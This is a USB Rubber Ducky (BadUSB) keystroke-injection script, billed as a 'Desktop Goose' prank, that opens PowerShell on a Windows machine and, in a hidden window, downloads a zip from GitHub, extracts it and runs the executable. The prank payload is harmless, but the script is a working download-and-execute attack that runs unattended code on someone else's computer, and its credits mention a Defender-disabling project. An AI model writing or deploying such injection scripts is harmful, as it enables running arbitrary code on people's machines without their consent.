REM Title: Desktop Goose
REM Author: FalsePhilosopher
REM Target:  Windows 10+
REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,Jakoby for some PS bits I used from ADV-Rickroll https://github.com/I-Am-Jakoby, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes
REM Version: 1.0
REM Category: Prank
REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen...  leave you a message, deliver you memes?
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/UberGuidoZ/FalsePhilosopher-BadUSB-Playground/raw/89f0c34e05fbf9926d6524b154d9d7be99763665/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
ENTER
